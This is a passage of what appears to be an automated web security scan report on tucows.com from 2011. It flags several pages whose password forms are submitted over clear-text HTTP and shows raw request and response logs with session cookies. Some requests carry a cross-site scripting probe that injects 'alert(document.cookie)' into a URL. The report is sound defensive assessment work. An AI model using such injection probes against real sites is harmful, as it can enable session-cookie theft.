Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.49. http://www.tucows.com/images/newassets/warningcow200.png

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.50. http://www.tucows.com/images/newassets/warningcow200.png

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/warningcow200.png

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.51. http://www.tucows.com/index.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.52. http://www.tucows.com/index.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password fields:

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.53. http://www.tucows.com/preview/194850/x22

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password fields:

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.54. http://www.tucows.com/preview/194850/x22

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.55. http://www.tucows.com/privacy.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.56. http://www.tucows.com/privacy.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password fields:

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.57. http://www.tucows.com/sitemap.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password fields:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.58. http://www.tucows.com/sitemap.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.59. http://www.tucows.com/software.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password field:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.60. http://www.tucows.com/software.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password fields:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.61. http://www.tucows.com/terms.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: The form contains the following password fields:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
